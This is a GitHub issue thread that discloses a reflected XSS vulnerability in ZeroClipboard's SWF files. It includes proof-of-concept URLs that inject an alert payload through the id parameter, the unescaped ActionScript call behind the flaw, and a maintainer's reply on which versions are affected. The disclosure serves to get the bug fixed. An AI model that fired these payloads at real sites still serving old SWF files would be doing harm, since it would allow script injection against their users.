### ISSUE TITLE
XSS (cross site scripting) in ZeroClipboard swf files

### ISSUE THREAD

**Issue by emanuelb** [zeroclipboard/zeroclipboard#14]
The ZeroClipboard.swf and ZeroClipboard10.swf are vulnerable to XSS attack, example:
http://website/js/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSS/.source);}//&width=500&height=500
http://website/js/ZeroClipboard10.swf#?id=\"))}catch(e){alert(/XSS/.source);}//&width=500&height=500
http://website/js/ZeroClipboard.swf?id=\"))}catch(e){alert(/XSS/.source);}//&width=500&height=500
http://website/js/ZeroClipboard10.swf?id=\"))}catch(e){alert(/XSS/.source);}//&width=500&height=500

vulnerable code:

 public function ZeroClipboard(){
        ....
            var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;
            id = flashvars.id;
        ....
            ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);

this files get a id parameter from url and passed it to second parameter inside ExternalInterface.call without any validation(only numbers) or proper escaping\encoding).
I reported the same issue here:
https://code.google.com/p/zeroclipboard/issues/detail?id=103

**Comment by paperalta** [comment]
Bug is not resolved. Check this

http://ZeroClipboard.swf?id=\%22%29%29}catch%28e%29{alert%28/XSS/.source
%29;}//&width=500&height=500

**Comment by JamesMGreene** [comment]
@paperalta: Using what version?  I cannot reproduce with any relatively modern version of ZeroClipboard and the old versions are obviously not going to be patched.

e.g. this does nothing:
http://cdn.rawgit.com/zeroclipboard/zeroclipboard/master/dist/ZeroClipboard.swf?swfObjectId=\%22%29%29}catch%28e%29{alert%28/XSS/.source%29;}//&width=500&height=500
